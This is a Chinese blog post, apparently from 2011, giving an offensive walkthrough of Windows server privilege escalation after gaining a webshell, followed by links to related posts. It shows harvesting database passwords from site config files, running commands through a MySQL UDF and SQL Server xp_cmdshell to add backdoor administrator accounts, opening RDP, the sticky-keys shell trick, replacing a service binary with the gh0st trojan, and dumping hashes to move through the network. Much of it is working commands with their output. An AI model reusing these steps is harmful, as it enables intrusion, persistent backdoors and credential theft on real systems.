服务器权限提升的一些技巧

原创 2011年01月13日 15:09:00

  查找配置文件,翻阅网站目录下的 config.asp config.php conn.asp inc目录查找 具有高权限的账号和密码

  比如说: root 密码 SA的密码。

  // [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商

  $dbhost = 'localhost';

  // 数据库服务器

  $dbuser = 'root';

  // 数据库用户名

  $dbpw = '123';

  // 数据库密码

  $dbname = 'discuz';

  // 数据库名

  $pconnect = 0;

  // 数据库持久连接 0=关闭, 1=打

  得到root 帐户密码:

  root

  123

  利用MySQL root 提权

  DLL已成功的导出到c://windows//system32//mysqlDll_1269695183.dll

  Function 'state' already exists

  select state("net user yhsafe yhsafe /add")

  SQL语句成功执行:Resource id #2

  Array

  (

  [0] => 命令成功完成。

  succeed!

  [state("net user yhsafe yhsafe /add")] => 命令成功完成。

  succeed!

  )

  利用 SA来提权

  server=localhost;UID=saWD=123;database=masterrovider=SQLOLEDB

  执行xp_cmdshell 假如没有,记得先恢复xp_cmdshell

  Exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'

  Exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'

  开启3389:

  Exec master.dbo.xp_cmdshell 'C:/inetpub/wwwroot/bbs/3389.exe 3389'

  返回结果:

  Now opening terminate service...success!

  5.2

  OK...

  开启成功

  2.利用一些软件配置漏洞,或者本地来进行提权。

  "巴西烤肉"提权:

  webshell下执行 ch.exe "net user 123 123 /add"

  360提权:

  360.exe 3389 //这样的话就开启了远程桌面

  按5下shift 就出弹出CMD

  3.替换服务法

  C:/ftp/FtpServer.exe

  对FtpServer.exe 重命名为 FtpServer1.exe

  上传一个反弹的远程控制程序。比方 gh0st

  gh0st 重命名为FtpServer.exe

  4.打破常规用webshell来进行Sniffer

  能Sniffer到整个服务器的FTP HTTP这类密码。

  需要用到Wireshark 专业工具来查看密码。

  5.dump 密码

  dump 需要administrator 甚至 system权限

  dump出hash 进而对内网进一步渗透

c++ 提升应用程序的权限

转自:http://blog.csdn.net/leez0301/article/details/8608609 1、判断当前用户权限是否管理员权限 [cpp]...
  • awu999328
  • awu999328
  • 2015年07月02日 11:49
  • 491

在某些项目进行开发的时候,需要提升应用程序本身的权限,这个是很容易的。

在某些项目进行开发的时候,需要提升应用程序本身的权限,这个是很容易的。 但是如何让VS2010启动的时候就已管理员权限运行程序呢?为这个问题苦恼了好久,终于找到了办法。 找到VS2010的快捷方式:...
  • lphbtm
  • lphbtm
  • 2016年08月10日 15:48
  • 496

提升进程权限的几个常用函数

文章一: 在枚举/结束系统进程或操作系统服务时,会出现自己权限不足而失败的情况,这时就需要提升自己进程到系统权限,其实提升权限的代码很简单的,看到过的最经典的应该是《WINDOWS核心编程》第四章中操...
  • qq_22642239
  • qq_22642239
  • 2017年04月10日 19:47
  • 329

Ubuntu下将普通用户提升到root权限

在shell里面输入  sudo gedit /etc/passwd   将里面的当前用户的ID值进行修改。 譬如我的当前用户是yuan 则找到: yuan:x:1001:1001:www.lin...
  • yuanzichao
  • yuanzichao
  • 2014年12月07日 16:52
  • 1373

win7 dos提升权限

Win7下以超级用户权限运行dos命令   Win7有很多命令在命令行模式下运行,提示没有管理员权限。 下面说下打开管理权限的命令行方法        在命令行下用命令runas来提升管理员权限  ...
  • chuncaijiayou
  • chuncaijiayou
  • 2013年12月14日 15:42
  • 4778

WEBSHELL权限提升技巧

  WEBSHELL权限提升技巧 c: d: e:..... C:/Documents and Settings/All Users/「开始」菜单/程序/      看这里能不能...
  • alei8583
  • alei8583
  • 2009年09月09日 15:36
  • 530

高手提升权限技巧

 本篇文章结合了许多高手提升权限的技巧和自己的一些想法 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1: C:/Documents and Settings/All ...
  • songguozhi
  • songguozhi
  • 2008年12月26日 17:26
  • 673

提升权限终极技巧

提升权限终极技巧   [ 日期: 2005-11-28 02:53 | 作者: d99 | 来自: WekweN | | ] ...
  • gujiannan
  • gujiannan
  • 2006年09月23日 18:19
  • 580

VC 一句代码提升进程权限

RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE,1,0,NULL); 这个函数封装在NtDll.dll中(在所有DLL加载之前加载),被微软严格保密,就是说你在MSD...
  • DavidHsing
  • DavidHsing
  • 2012年04月24日 15:07
  • 8950

【总结】用户权限设置和进程权限提升

使用某些Windows API的时候需要提升进程的默认权限,例如RegRestoreKey需要SE_RESTORE_NAME 和SE_BACKUP_NAME 权限。在这种情况下,我们需要使用到一组Wi...
  • yockie
  • yockie
  • 2013年11月29日 20:23
  • 16973
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:服务器权限提升的一些技巧
举报原因:
原因补充:

(最多只允许输入30个字)